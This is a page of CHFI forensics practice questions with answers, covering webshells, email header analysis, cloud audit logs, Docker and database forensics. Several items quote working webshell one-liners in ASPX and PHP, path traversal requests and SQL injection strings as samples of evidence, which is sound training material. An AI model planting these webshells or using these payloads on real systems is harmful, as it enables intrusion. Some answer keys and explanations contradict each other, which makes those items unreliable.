CCNA Chfi App Email Cloud Questions

75 of 155 questions · Page 2/3 · Chfi App Email Cloud topic · Answers revealed

76
Multi-Selectmedium

Which TWO of the following are appropriate techniques for identifying a webshell on a compromised web server?

Select 2 answers
A.Verifying SSL certificate validity
B.Searching for files with recent creation or modification timestamps in the web root
C.Running a full antivirus scan on the server
D.Analyzing web server logs for anomalous POST requests to script files that return 200 OK with large response sizes
E.Checking for open ports on the server
AnswersB, D

Webshells are often uploaded shortly before use, so recent timestamps are suspicious.

Why this answer

Webshells are often detected by recent file timestamps and anomalous POST requests in logs.

77
MCQhard

During a forensic investigation of a compromised web server, you find a file named 'cmd.aspx' in the uploads directory. The file contains: <%@ Page Language="C#" %><% Response.Write(System.Diagnostics.Process.Start("cmd.exe","/c "+Request.QueryString["cmd"])).StandardOutput.ReadToEnd(); %>. What is the most likely purpose of this file?

A.It is a database connection string
B.It is a legitimate ASP.NET application page for server management
C.It is a webshell used for remote command execution
D.It is a cross-site scripting payload
AnswerC

The code runs cmd.exe with user-supplied commands, characteristic of a webshell.

Why this answer

This is a webshell that executes arbitrary operating system commands via the 'cmd' query parameter. It allows remote command execution on the server.

78
MCQhard

In a Docker container forensics investigation, an analyst needs to examine the file system of a stopped container to look for malicious artifacts. Which command should the analyst run to create a recoverable snapshot of the container's file system without starting the container?

A.docker cp <container_id>:/path /host/path
B.docker export <container_id> -o output.tar
C.docker save <image_id> -o output.tar
D.docker commit <container_id>
AnswerB

docker export exports the container's file system as a tar archive, suitable for offline analysis, without starting the container.

Why this answer

docker export captures the file system of a stopped container as a tar archive for forensic analysis.

79
MCQhard

In an email header, an analyst notices the following: 'Received: from mail.attacker.com (192.168.2.100) by mail.victim.com (Postfix) with ESMTP id ABC123 for <user@victim.com>; ...'. The 'From' address appears as 'ceo@victim.com'. Which type of attack is most likely?

A.Man-in-the-middle
B.Email spoofing
C.Malware attachment
D.Phishing
AnswerB

The mismatch between the From domain and the originating server indicates spoofing.

Why this answer

The email claims to be from 'ceo@victim.com' but was received from 'mail.attacker.com', indicating the sender forged the From address. This is email spoofing.

80
MCQeasy

An email forensic analyst receives a suspicious email and examines the full headers. Which header field is the MOST reliable for determining the true originating IP address of the sender, assuming no spoofing of the header?

A.Return-Path
B.Received
C.Message-ID
D.From
AnswerB

Each mail server adds its own Received header; the bottommost Received header (the first one added) typically shows the originating IP.

Why this answer

The Received headers are added by each SMTP server; the first Received header (bottommost) contains the IP of the originating server.

81
MCQmedium

An analyst is investigating a data exfiltration incident. The MySQL transaction logs show a series of unusual SELECT queries retrieving large amounts of data from the 'customers' table, executed by a user account 'webapp'. What should the analyst check NEXT to determine if the data was actually exfiltrated?

A.Review the web server access logs for requests to external IPs containing the queried data
B.Examine the database schema for unauthorized stored procedures
C.Analyze the MySQL audit logs for privilege escalation attempts
D.Check the MySQL binary logs for any DELETE or DROP statements
AnswerA

Web server logs may show HTTP requests exfiltrating data, providing evidence of actual transfer.

Why this answer

After identifying suspicious queries, the analyst should check the application server logs to see if the results were sent externally.

82
MCQmedium

A cloud forensic investigator is examining AWS CloudTrail logs for signs of unauthorized access to an S3 bucket. Which of the following CloudTrail event names would indicate a successful attempt to list the objects in the bucket?

A.GetObject
B.PutObject
C.DeleteObject
D.ListObjects
AnswerD

ListObjects is the API call to list objects in a bucket.

Why this answer

The ListObjects operation lists the objects in an S3 bucket; the CloudTrail event name is 'ListObjects'.

83
MCQmedium

An IIS log entry shows: `2024-07-15 14:22:10 10.0.0.5 GET /../../windows/system32/cmd.exe 404 - Mozilla/5.0`. What attack technique does this log entry indicate?

A.Remote code execution (RCE)
B.Directory traversal
C.Cross-site request forgery (CSRF)
D.SQL injection
AnswerB

The ../ sequences are used to traverse directories and access cmd.exe, a classic path traversal attempt.

Why this answer

The presence of '../' sequences in the URI path indicates a path traversal attack attempting to access files outside the web root.

84
MCQmedium

A security analyst finds the following entry in the Apache access log: 10.0.0.5 - - [20/Jan/2023:08:12:44 +0000] "GET /../../../../etc/passwd HTTP/1.1" 404 345 "-" "curl/7.68.0". Which attack was attempted?

A.Remote File Inclusion
B.Path Traversal
C.Command Injection
D.Cross-Site Request Forgery (CSRF)
AnswerB

The '../' sequences are used to navigate directories outside the web root to access sensitive files.

Why this answer

The URI contains '../../../../etc/passwd', which is a path traversal attempt to read the /etc/passwd file. The 404 status indicates the file was not found, but the intent is clear.

85
Multi-Selectmedium

An email investigation reveals that a phishing email was sent from a domain that uses DKIM and SPF. The email headers contain: 'DKIM-Signature: v=1; a=rsa-sha256; d=example.com; s=selector1; bh=...; h=...; b=...' and 'Received-SPF: pass (example.com: domain of sender@example.com designates 203.0.113.5 as permitted sender)'. Which TWO conclusions can be drawn?

Select 2 answers
A.The email is definitely legitimate and not spoofed
B.The email's DKIM signature is valid
C.The email was sent from a compromised account
D.The email originated from a different domain
E.The sending server (203.0.113.5) is authorized by the domain's SPF record
AnswersB, E

A valid DKIM signature is present.

Why this answer

SPF pass indicates the sending IP is authorized; DKIM signature validates the email was signed by the domain. Combined, the email is likely not spoofed.

86
MCQhard

An analyst finds the following entry in an IIS access log: 10.0.0.5, -, 10/10/2023, 14:30:22, W3SVC1, WEB01, 192.168.1.100, 80, GET, /login.aspx, 200, 0, 1234, 567, Mozilla/5.0+. Based on the log format, which field contains the HTTP status code?

A.200
B.GET
C.80
D.0
AnswerA

The status code is typically placed after the URI stem.

Why this answer

IIS W3C Extended Log Format includes fields: date, time, client IP, cs-uri-stem, sc-status. In the given entry, the status code 200 appears after the URI and before the 0 (sc-substatus).

87
MCQmedium

A forensic investigator needs to collect evidence from a Google Cloud Platform (GCP) environment. Which of the following GCP services provides audit logs for administrative activities and data access?

A.Cloud Storage logs
B.Cloud Monitoring
C.Cloud IAM
D.Cloud Audit Logs
AnswerD

Cloud Audit Logs capture who did what, where, and when.

Why this answer

Cloud Audit Logs in GCP record administrative activities (Admin Activity logs) and data access (Data Access logs) for GCP resources.

88
MCQmedium

A forensic investigator finds a suspicious file named `cmd.aspx` in the web root of a compromised IIS server. The file contains code that accepts command input via HTTP GET parameters and executes it on the server. What is the MOST likely classification of this file?

A.Trojan horse
B.Cross-site scripting (XSS) exploit
C.SQL injection payload
D.Web shell
AnswerD

A web shell allows remote command execution via HTTP requests, fitting the description.

Why this answer

A file that accepts commands via HTTP and executes them on the server is a web shell. ASPX is a common extension for .NET web shells.

89
MCQmedium

A security analyst is reviewing Apache access logs and finds repeated requests to /index.php?id=1' OR '1'='1. Which type of attack is MOST likely being attempted?

A.Remote file inclusion
B.Path traversal
C.SQL injection
D.Cross-site scripting (XSS)
AnswerC

The payload 1' OR '1'='1 is a standard SQL injection test to manipulate queries.

Why this answer

The pattern 1' OR '1'='1 is a classic SQL injection payload attempting to bypass authentication or extract data. The single quote and OR condition are characteristic of SQLi.

90
Multi-Selecthard

Which TWO of the following are valid methods to collect logs from Docker containers for forensic analysis? (Select TWO)

Select 2 answers
A.Using docker logs command to retrieve container logs
B.Using docker inspect to get log configuration
C.Copying log files from the container using docker cp
D.Using docker exec to run syslog inside the container
E.Using docker image to view the image layers
AnswersA, C

docker logs fetches the container's console output.

Why this answer

The 'docker logs' command captures container stdout/stderr, and the 'docker cp' command can copy log files from the container filesystem. Other methods are not directly applicable.

91
MCQmedium

Which of the following is a significant challenge in cloud forensics compared to traditional digital forensics?

A.Inability to collect memory dumps
B.Multi-tenancy and data segregation
C.Lack of logging
D.Data volatility
AnswerB

Cloud environments share resources among multiple tenants, complicating evidence isolation.

Why this answer

Multi-tenancy in cloud environments means that evidence from one tenant may be co-mingled with data from other tenants, and isolation can be difficult.

92
MCQhard

A forensic analyst is investigating a MySQL database server breach. Which log is MOST useful for identifying a series of queries that exfiltrated data, assuming the attacker used a compromised application account?

A.General query log
B.Binary log
C.Slow query log
D.Error log
AnswerA

Logs every query, so exfiltration queries would be visible.

Why this answer

MySQL general query log logs all queries, but can be resource-intensive. Binary logs record changes. Error logs contain errors.

Slow query log logs slow queries. The general query log is best for seeing all queries from a compromised account.

93
MCQmedium

An email forensic analyst receives a suspicious email and wants to verify the originating IP address. The analyst extracts the email headers and sees multiple 'Received' fields. Which 'Received' header should the analyst consider as the most trustworthy source of the sender's IP?

A.The first 'Received' header at the top
B.The last 'Received' header at the bottom
C.The 'X-Originating-IP' header
D.The 'Return-Path' header
AnswerB

The bottom Received header is the closest to the sender's MTA, thus the most reliable for identifying the original source IP.

Why this answer

The lowest (last) 'Received' header in the email is the first hop from the sender's MTA, making it the most trustworthy for the originating IP.

94
MCQhard

An incident responder is analyzing a compromised web server and finds a file named 'cmd.aspx' in the uploads directory. The file contains ASP.NET code that accepts commands via the 'cmd' parameter and executes them on the server. Which of the following best describes this artifact?

A.A legitimate administrative tool for server management
B.A webshell allowing remote command execution
C.A backdoor installed via a SQL injection vulnerability
D.A malware dropper for deploying ransomware
AnswerB

The file accepts commands and executes them, classic webshell behavior.

Why this answer

A web shell is a script uploaded to a web server that allows remote command execution. The filename and behavior match a webshell.

95
Multi-Selecthard

A security analyst is investigating a potential data breach in a GCP environment. The analyst reviews the GCP audit logs and finds the following events: (1) A service account was granted the 'roles/storage.objectAdmin' role on a storage bucket containing sensitive data, (2) The service account then listed objects in the bucket, (3) The service account downloaded several objects. Which THREE actions should the analyst take immediately?

Select 3 answers
A.Analyze the IAM policy change that granted the role to identify the source
B.Revoke the service account's excessive permissions
C.Contact law enforcement immediately
D.Preserve the audit logs by exporting them to a secure location
E.Delete the storage bucket to prevent further access
AnswersA, B, D

Understanding how the grant occurred is crucial.

Why this answer

The analyst should revoke access to prevent further exfiltration, preserve the logs for investigation, and examine the source of the role grant (IAM changes).

96
MCQeasy

In an email header, which field typically contains the IP address of the original sending client?

A.Return-Path
B.Message-ID
C.Received
D.DKIM-Signature
AnswerC

The Received header includes the IP address of the server that received the email. The bottommost Received header typically shows the originating client IP.

Why this answer

The 'Received' field in an email header is added by each mail transfer agent (MTA) that processes the message, and the first 'Received' header (at the bottom of the header block) typically contains the IP address of the original sending client (the SMTP client that initiated the connection). This field records the 'from' IP and the 'by' host, making it the definitive source for tracing the origin of the email.

Exam trap

EC-Council often tests the misconception that the 'Return-Path' field contains the sender's IP address, when in fact it only holds the email address for bounce handling, not any network-layer information.

How to eliminate wrong answers

Option A is wrong because the 'Return-Path' field contains the envelope sender (the bounce address), not the IP address of the sending client; it is used for non-delivery reports, not for tracing the original source IP. Option B is wrong because the 'Message-ID' field is a unique identifier string generated by the sending MUA or MTA, but it does not contain any IP address information; it is used for message tracking and threading. Option D is wrong because the 'DKIM-Signature' field contains a cryptographic signature and associated domain information (e.g., d=domain), but it does not include the sending client's IP address; it is used for email authentication, not origin IP tracing.

97
Multi-Selecteasy

Which TWO of the following are indicators of a webshell attack found in web server logs? (Select TWO)

Select 2 answers
A.Abnormal HTTP methods like OPTIONS or TRACE
B.High volume of traffic from a single IP
C.Requests to a .asp or .php file with parameters like cmd or exec
D.Frequent 404 errors for non-existent pages
E.POST requests to a script file in an upload directory
AnswersC, E

Common webshells accept commands via such parameters.

Why this answer

Webshells often involve file uploads to directories like uploads, and subsequent requests to that file with parameters indicating command execution (e.g., cmd=).

98
MCQhard

A forensic analyst is examining a PST file extracted from a suspect's computer. The analyst wants to recover deleted emails that are no longer visible in the Outlook folder hierarchy. Which approach is most effective?

A.Perform file carving on the PST file using a forensic tool
B.Open the PST in Outlook and check the 'Recoverable Items' folder
C.Use a hex editor to manually reconstruct deleted emails
D.Use a PST viewer to read the file directly
AnswerB

Outlook has a Recoverable Items folder that holds deleted items until the retention period expires.

Why this answer

Deleted items in PST files may still reside in the 'Deleted Items' folder or be recoverable from the Recoverable Items folder (dumpster) before permanent deletion.

99
MCQmedium

In MySQL forensics, which log file is most commonly used to detect unauthorized data exfiltration or changes to database records?

A.Binary log
B.Slow query log
C.General query log
D.Error log
AnswerA

Binary log records all data changes in a compact format, ideal for identifying exfiltration or tampering.

Why this answer

The binary log (binlog) records all changes to database data and structure (INSERT, UPDATE, DELETE, DDL). It is essential for forensic analysis of data manipulation events.

100
MCQmedium

A forensic analyst is examining a Microsoft Outlook PST file as part of an email investigation. Which tool is specifically designed to parse and analyze PST files and extract email metadata?

A.Wireshark
B.EmailTracker
C.Sleuth Kit
D.Aid4Mail
AnswerD

Aid4Mail is a forensic email extraction and analysis tool.

Why this answer

Aid4Mail is a forensic email analysis tool that supports PST, OST, MBOX, and other formats. It is commonly used for email investigations.

101
MCQmedium

Which tool is specifically designed to extract metadata from email messages, including tracking the route and identifying the originating IP address?

A.EmailTracker
B.Wireshark
C.MailXaminer
D.Outlook
AnswerA

EmailTracker specializes in analyzing email headers and metadata for forensic purposes.

Why this answer

EmailTracker is a tool that analyzes email headers to trace the path and identify the source IP, often used in email forensics.

102
MCQhard

During a forensic investigation of a compromised web server, an analyst finds the following entry in the IIS access log: 192.168.1.5, -, 04/May/2024:14:23:11, GET /scripts/..%5c../windows/system32/cmd.exe, 200. What is the probable attack vector?

A.Brute force attack
B.Cross-site scripting
C.Path traversal
D.SQL injection
AnswerC

The ..%5c.. sequence is a path traversal payload to access cmd.exe.

Why this answer

The log shows a path traversal attempt using URL-encoded backslashes (%5c) to navigate to cmd.exe. The 200 status indicates the request succeeded. This is a classic path traversal attack.

103
MCQeasy

In database forensics, which type of log records every transaction (including INSERT, UPDATE, DELETE) and allows reconstruction of database changes over time?

A.Audit log
B.Error log
C.Transaction log
D.Slow query log
AnswerC

Transaction logs capture every data modification operation.

Why this answer

Transaction logs (also called redo logs) record all changes to the database, enabling point-in-time recovery and auditing of data modifications.

104
MCQhard

An analyst is investigating a possible data exfiltration via email. The analyst notices that the email headers contain a DKIM-Signature field that is invalid. Which of the following does a failed DKIM check indicate?

A.The email's content has been modified since it was signed
B.The email was sent through a proxy server
C.The email client does not support DKIM
D.The email was sent from a different domain than the one in the From field
AnswerA

DKIM failure typically means the signature is invalid, possibly due to tampering.

Why this answer

DKIM provides a digital signature that verifies the email was not tampered with and originates from the claimed domain. A failed DKIM check indicates the email may have been altered or spoofed.

105
Multi-Selectmedium

Which TWO of the following are common indicators of a path traversal attack found in web server logs? (Select 2)

Select 2 answers
A.Requests containing a large number of User-Agent strings
B.Requests containing '../' sequences
C.Requests containing '<script>' tags
D.Requests containing '%2e%2e%2f'
E.Requests containing 'OR 1=1'
AnswersB, D

Direct directory traversal pattern.

Why this answer

Path traversal attacks use '../' sequences or encoded versions to access files outside the web root. Both options A and B are typical signatures.

106
MCQhard

A forensic analyst is investigating a webshell on an IIS server. The access.log shows: 10.0.0.5, -, 12/Mar/2023:14:22:10 +0000, POST /uploads/cmd.aspx, 200, 0, 1234. Which log entry is most indicative of webshell activity?

A.The use of POST method on an ASPX file
B.The small response size of 1234 bytes
C.The lack of a user-agent in the log
D.The file path '/uploads/cmd.aspx' and the 200 status code
AnswerD

The name 'cmd.aspx' suggests command execution, and the uploads directory is a common webshell location.

Why this answer

A POST request to an ASPX file in an uploads directory returning 200 with a small response size and user-agent is suspicious.

107
MCQhard

During a cloud forensics investigation, an analyst examines AWS CloudTrail logs and finds an event with "userIdentity":{"type":"AssumedRole","arn":"arn:aws:sts::123456789012:assumed-role/AdminRole/i-0abcd1234efgh5678"}. What does the 'i-0abcd1234efgh5678' portion most likely represent?

A.The AWS account ID of the role's trusted entity
B.The role's unique identifier assigned by IAM
C.The unique ID of the IAM user who assumed the role
D.The session name, which is typically the EC2 instance ID
AnswerD

EC2 instances use their instance ID as session name when assuming roles.

Why this answer

In CloudTrail, when an EC2 instance assumes a role, the session name is often the instance ID. The 'i-' prefix and alphanumeric string indicate an EC2 instance ID.

108
MCQmedium

An incident responder is analyzing AWS CloudTrail logs to determine if an unauthorized user accessed an S3 bucket. Which of the following CloudTrail event fields should be examined to identify the IAM user or role that made the API call?

A.sourceIPAddress
B.eventSource
C.requestParameters
D.userIdentity
AnswerD

Contains identity details of the requester.

Why this answer

The userIdentity field contains details about the identity that made the request, including ARN, user name, and type (IAM user, role, etc.).

109
MCQeasy

In email forensics, which artifact is stored in Outlook's Personal Folders (.pst) files and can be analyzed using tools like Aid4Mail or EmailTracker?

A.Only the email body text
B.Emails and attachments only
C.Email headers only
D.Emails, attachments, calendars, contacts, and other mailbox items
AnswerD

.pst files are comprehensive mailbox archives.

Why this answer

.pst files contain emails, attachments, calendars, contacts, and other mailbox items for offline access. Aid4Mail can parse these files for forensic analysis.

110
MCQhard

During a cloud forensic investigation, an analyst discovers that an AWS EC2 instance was used to launch an attack. The instance has been terminated. Which source is MOST likely to contain evidence of the commands executed on the instance?

A.VPC Flow Logs
B.EC2 instance metadata
C.AWS Systems Manager Agent logs
D.AWS CloudTrail logs
AnswerC

SSM Agent can log Run Command execution details, which may persist if configured to send to CloudWatch or S3.

Why this answer

AWS CloudTrail records API calls for EC2 instance management but not OS-level commands. VPC Flow Logs capture network traffic. EC2 instance metadata is about the instance configuration.

AWS Systems Manager Agent (SSM Agent) can log commands executed via AWS Systems Manager, including Run Command, which can capture command history even after instance termination if logs were sent to CloudWatch.

111
Multi-Selecteasy

A forensic analyst is examining a Docker container image for malware. Which TWO techniques can help analyze the image layers?

Select 2 answers
A.Use 'docker history' to view the build history of the image
B.Use 'docker images' to list all images
C.Use 'docker inspect' to view the image metadata
D.Use 'docker save' to export the image as a tar file and extract layers
E.Use 'docker export' on a running container
AnswersA, D

Shows each layer and the command that created it.

Why this answer

'docker history' shows the build commands and layers, which helps identify suspicious steps. 'docker export' exports the container filesystem but not layers individually. 'docker save' saves the image as a tar, allowing layer extraction. 'docker inspect' shows metadata only. 'docker images' lists images.

112
MCQeasy

Which tool is specifically designed to extract and analyze email metadata, including headers, from various email client formats such as PST and OST files?

A.Wireshark
B.EmailTracker
C.Aid4Mail
D.FTK Imager
AnswerC

Aid4Mail is a forensic email extraction tool that supports PST, OST, MBOX, and many other formats, allowing metadata analysis.

Why this answer

Aid4Mail is a commercial forensic tool that can extract emails and metadata from PST, OST, MBOX, and other formats. EmailTracker is primarily for tracking email delivery, not forensic analysis of client files.

113
MCQmedium

An analyst reviews an Apache access log entry: '192.168.1.10 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 1234 "-" "Mozilla/5.0"'. Which attack does this log entry most likely indicate?

A.SQL injection (SQLi) attack
B.Cross-site scripting (XSS) attack
C.Path traversal attack
D.Remote file inclusion (RFI) attack
AnswerA

The payload includes SQL logical operators and quotes, indicating a SQL injection attempt.

Why this answer

The URL-encoded payload contains SQL injection syntax (%27 is a single quote), attempting to inject an OR condition. This is indicative of a SQL injection attempt.

114
MCQmedium

In an AWS environment, a security analyst detects unusual API calls that created several IAM users with administrative privileges from an unfamiliar IP address. Which AWS service log should be examined first to identify the specific API calls and the IAM user that made them?

A.Amazon S3 access logs
B.AWS CloudWatch Logs
C.AWS CloudTrail
D.AWS Config
AnswerC

CloudTrail logs all AWS API calls, making it the primary source for investigating API activity.

Why this answer

AWS CloudTrail records all API calls made to the AWS environment, including IAM user creation. It provides details like the source IP, user identity, and the specific API action.

115
MCQhard

A forensic investigator examining a compromised Linux server finds a base64-encoded string in the Apache access log: 'GET /cgi-bin/test.cgi?cmd=ZWNobyAiPD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/PiI+...' After decoding, the string contains a PHP webshell. Which of the following is the MOST effective method to confirm the webshell was executed on the server?

A.Perform a memory dump of the server and search for the base64 string
B.Check the server's process accounting logs (e.g., auditd, 'lastcomm') for PHP process invocation with the cmd parameter
C.Analyze the MySQL transaction logs for any database queries triggered by the webshell
D.Search for the decoded PHP code in the web server's document root
AnswerB

Process logs can show that the PHP interpreter ran the cmd parameter, confirming execution.

Why this answer

To confirm execution, the investigator should examine the server's process history or audit logs (e.g., auditd, bash history) to see if the cmd parameter was processed by the PHP interpreter.

116
Multi-Selectmedium

A forensic analyst is investigating a web application that was defaced. The Apache access logs show the following entries: (1) GET /cgi-bin/test.cgi HTTP/1.1 with status 200, (2) POST /cgi-bin/test.cgi HTTP/1.1 with status 200, (3) GET /index.html HTTP/1.1 with status 200, (4) GET /images/ HTTP/1.1 with status 301. Which TWO log entries are most suspicious and indicate a likely attack vector?

Select 2 answers
A.POST /cgi-bin/test.cgi
B.GET /index.html
C.GET /images/
D.GET /cgi-bin/test.cgi
E.All entries are equally suspicious
AnswersA, D

POST to a CGI script can indicate command injection.

Why this answer

Entries to /cgi-bin/test.cgi with both GET and POST suggest probing and command execution via CGI. The others are normal traffic.

117
MCQeasy

An investigator needs to recover deleted emails from a Microsoft Outlook PST file. Which forensic technique is most appropriate?

A.Use a hex editor to manually reconstruct the PST headers
B.Convert the PST to EML and open each file individually
C.Perform file carving on the PST file to recover deleted email fragments
D.Mount the PST file and use Outlook's 'Recover Deleted Items' feature
AnswerC

Carving can recover deleted data from the PST binary structure.

Why this answer

Deleted items in PST files are often recoverable until overwritten; carving can recover remnants.

118
Multi-Selectmedium

A forensic analyst is examining MySQL binary logs to identify a data exfiltration event. Which TWO fields are most critical for reconstructing the stolen data?

Select 2 answers
A.Error code
B.Timestamp
C.Server ID
D.SQL statement
E.Thread ID
AnswersB, D

Timestamp shows when the query executed, aiding timeline reconstruction.

Why this answer

The SQL statement reveals what data was retrieved, and the timestamp helps establish the timeline.

119
MCQeasy

A security analyst reviews an Apache access log entry: 192.168.1.5 - - [10/Jan/2024:08:12:35 +0000] "GET /index.php?id=1 UNION SELECT username,password FROM users-- HTTP/1.1" 200 4321 "-" "Mozilla/5.0". What type of attack is MOST likely indicated?

A.Cross-site scripting (XSS)
B.Path traversal
C.Remote file inclusion
D.SQL injection
AnswerD

The UNION SELECT clause indicates an attempt to extract data from the database.

Why this answer

The log entry shows a UNION SELECT statement appended to the id parameter, which is a classic SQL injection attempt.

120
MCQhard

While investigating a compromised web server, you discover a file named 'shell.php' in the web root. The file contains the following code: <?php system($_GET['cmd']); ?>. Which of the following best describes this file?

A.A SQL injection script
B.A file upload vulnerability exploit
C.A backdoor trojan
D.A web shell
AnswerD

Webshells provide a command-line interface via HTTP.

Why this answer

This PHP code executes system commands passed via the 'cmd' GET parameter. This is a classic webshell, allowing remote command execution.

121
MCQeasy

Which of the following is a primary challenge in cloud forensics due to the shared responsibility model?

A.Inability to perform live acquisition of volatile data without cooperation from the cloud provider
B.Data is always stored in a single jurisdiction
C.Lack of encryption support
D.Cloud logs are immutable and cannot be altered
AnswerA

In cloud environments, forensic investigators often lack physical or administrative access to capture volatile data (e.g., memory) without provider assistance.

Why this answer

The shared responsibility model means the cloud provider controls the infrastructure, limiting the investigator's ability to acquire volatile data without provider support.

122
Multi-Selecthard

During a forensic analysis of a compromised web server, an investigator identifies the following log entries. Which THREE entries are the strongest indicators of a successful web shell upload? (Choose three.)

Select 3 answers
A.POST /upload.php HTTP/1.1 200 0
B.POST /uploads/shell.aspx HTTP/1.1 200 - -
C.GET /uploads/shell.aspx?cmd=dir HTTP/1.1 200 - -
D.GET /../../windows/system32/cmd.exe HTTP/1.1 404 - -
E.GET /images/logo.png HTTP/1.1 304 - -
AnswersA, B, C

A successful POST to upload.php could be a PHP-based web shell upload.

Why this answer

Successful uploads of aspx or php files that contain web shell code (e.g., with cmd parameter) and subsequent access to those files are strong indicators. The 404 for cmd.exe indicates a path traversal attempt, not a web shell.

123
Multi-Selecthard

Which THREE of the following are challenges specific to container forensics? (Select THREE.)

Select 3 answers
A.Containers share the same kernel as the host, limiting isolation for forensic acquisition
B.Network isolation prevents packet capture
C.Ephemeral nature of containers leads to volatile evidence
D.Standard forensic imaging tools can be directly applied
E.Need to analyze layered image filesystem instead of a single disk image
AnswersA, C, E

This complicates evidence collection without affecting other containers.

Why this answer

Containers are ephemeral (volatile evidence), they share the host kernel (limited isolation), and they rely on layered images that must be analyzed. Standard disk imaging tools may not work; network isolation is not a specific challenge.

124
Multi-Selectmedium

A forensic analyst is examining a Google Cloud Platform (GCP) environment after a security incident. Which TWO GCP services should the analyst use to audit API activity and resource changes? (Select TWO.)

Select 2 answers
A.Cloud Asset Inventory
B.Cloud Audit Logs
C.Cloud Storage Object Change Notification
D.Cloud Monitoring
E.Cloud Functions
AnswersA, B

Cloud Asset Inventory provides a history of resource configurations and changes.

Why this answer

Cloud Audit Logs record API calls and resource changes, while Cloud Asset Inventory tracks resource history and configuration changes.

125
Multi-Selecthard

A cloud forensic investigator is analyzing a GCP audit log entry for a Compute Engine instance. Which THREE fields are essential for identifying the user and operation performed?

Select 3 answers
A.requestMetadata.callerIp
B.methodName
C.resourceName
D.requestMetadata.userAgent
E.authenticationInfo.principalEmail
AnswersB, C, E

Indicates the operation (e.g., v1.compute.instances.delete).

Why this answer

GCP audit logs include the principal email (authenticationInfo), operation type (methodName), and resource name (resourceName). IP address and user agent may be in requestMetadata but not always in every log entry.

126
Multi-Selectmedium

Which TWO of the following are common challenges specific to cloud forensics? (Select TWO)

Select 2 answers
A.Volatile memory acquisition
B.Inability to image hard drives
C.Data jurisdiction and legal compliance
D.Multi-tenancy and separation of data
E.Lack of proper tools
AnswersC, D

Data may reside in different countries with varying laws, posing jurisdictional issues.

Why this answer

Multi-tenancy (shared infrastructure) and data jurisdiction (where data is physically stored) are unique to cloud forensics, unlike physical or virtual environments.

127
MCQeasy

Which of the following tools is specifically designed to analyze email headers and track the path of an email, providing information about delays and potential spoofing?

A.EmailTracker
B.Wireshark
C.FTK Imager
D.Autopsy
AnswerA

EmailTracker is designed for email header analysis and tracking.

Why this answer

EmailTracker is a tool that analyzes email headers, visualizes the path, and helps identify spoofing and delivery delays.

128
MCQmedium

During a database forensic investigation, you need to review Microsoft SQL Server transaction logs to identify unauthorized data modifications. Which of the following SQL Server functions or commands is used to read the transaction log?

A.SELECT * FROM sys.dm_tran_database_transactions
B.DBCC LOG
C.fn_dblog
D.BACKUP LOG
AnswerC

fn_dblog reads the transaction log and provides detailed information.

Why this answer

fn_dblog is an undocumented function that reads the SQL Server transaction log and returns log records. It is commonly used in forensic analysis.

129
Multi-Selecthard

An incident response team is investigating a breach involving a Docker container. Which THREE of the following actions should the team take to preserve forensic evidence?

Select 3 answers
A.Stop the container immediately to prevent further compromise
B.Use docker export to save the container's filesystem as a tar archive
C.Run docker commit to create an image from the container
D.Use docker inspect to examine container metadata before stopping
E.Execute docker logs to capture container logs
AnswersB, C, E

Exports the container's filesystem for offline analysis.

Why this answer

Creating a container image preserves the filesystem and configuration. Saving logs via docker logs captures runtime output. Exporting the container as a tar archive preserves the filesystem.

Inspecting while running is not safe for preservation. Deleting removes evidence.

130
MCQeasy

Which of the following tools is specifically designed for parsing and analyzing email headers to detect spoofing and trace the origin of an email?

A.EmailTracker
B.Wireshark
C.Volatility
D.Sleuth Kit
AnswerA

EmailTracker is designed for email header analysis and tracing.

Why this answer

EmailTracker is a tool that analyzes email headers to track the path of an email and detect spoofing.

131
MCQmedium

A forensic analyst is reviewing Microsoft IIS logs and finds the entry: 192.168.1.50, -, 10/Feb/2025:14:22:10 +0000, GET /scripts/..%c1%af../winnt/system32/cmd.exe, 404. Which attack technique is indicated by the encoded characters in the URI?

A.Directory listing attempt
B.SQL injection (SQLi)
C.Cross-site scripting (XSS)
D.Path traversal attack using Unicode encoding
AnswerD

The %c1%af is Unicode for '/', used to traverse directories.

Why this answer

The ..%c1%af.. is an encoded path traversal sequence (Unicode encoding) used to bypass filters and access restricted files.

132
MCQmedium

In cloud forensics, which AWS service logs API calls for governance, compliance, and operational auditing, and is the primary source for detecting unauthorized access?

A.AWS CloudTrail
B.AWS Config
C.Amazon CloudWatch
D.AWS GuardDuty
AnswerA

CloudTrail logs all API calls for auditing and security analysis.

Why this answer

AWS CloudTrail is the service that records API activity in the AWS account, providing logs for security analysis, incident investigation, and compliance auditing.

133
MCQeasy

Which cloud service log is most appropriate for tracking API calls and resource changes in an AWS environment?

A.AWS VPC Flow Logs
B.AWS Config
C.AWS CloudTrail
D.AWS CloudWatch Logs
AnswerC

CloudTrail records all API calls and resource changes for auditing.

Why this answer

AWS CloudTrail is the service that records API activity and resource changes.

134
MCQmedium

During an investigation of a suspected data exfiltration, a forensic analyst examines MySQL general query logs and finds a large number of SELECT queries retrieving customer records, followed by DELETE queries. Which of the following is the most likely conclusion?

A.An attacker exfiltrating data and then deleting the records to cover tracks
B.An attempted SQL injection attack
C.A misconfigured replication process
D.Normal database maintenance operations
AnswerA

SELECT then DELETE indicates data theft and cleanup.

Why this answer

The combination of bulk SELECT (exfiltration) followed by DELETE (cover tracks) is a classic pattern of data theft.

135
MCQmedium

A security analyst reviews the following Apache access log entry: 192.168.1.10 - - [15/May/2025:10:15:23 +0000] "GET /search.php?q=1'%20OR%20'1'='1 HTTP/1.1" 200 5321 "-" "Mozilla/5.0". Which type of attack is most likely indicated?

A.Cross-site scripting (XSS)
B.Path traversal
C.Remote file inclusion
D.SQL injection (SQLi)
AnswerD

The payload ' OR '1'='1 is a classic SQL injection attempt to bypass authentication or extract data.

Why this answer

The log shows a GET request with a SQL injection payload (1' OR '1'='1) in the 'q' parameter. The HTTP 200 response indicates the server processed the request, suggesting a successful or attempted SQL injection.

136
MCQhard

During a Docker forensics investigation, an analyst needs to identify the commands executed within a deleted container. Which of the following approaches is MOST effective to retrieve this information?

A.Check the Docker daemon logs for container start/stop events
B.Search the host filesystem for the container's log files in /var/lib/docker/containers
C.Use `docker inspect` on the container ID
D.Examine the container's image layers using `docker history`
AnswerB

Container logs (stdout/stderr) are stored in JSON files under the container ID directory. If not overwritten, they contain the commands' output.

Why this answer

Docker stores container logs in JSON files on the host. Even after a container is removed, its logs may remain on the host filesystem under /var/lib/docker/containers until cleaned. Inspecting image layers only shows filesystem changes, not runtime commands.

137
Multi-Selectmedium

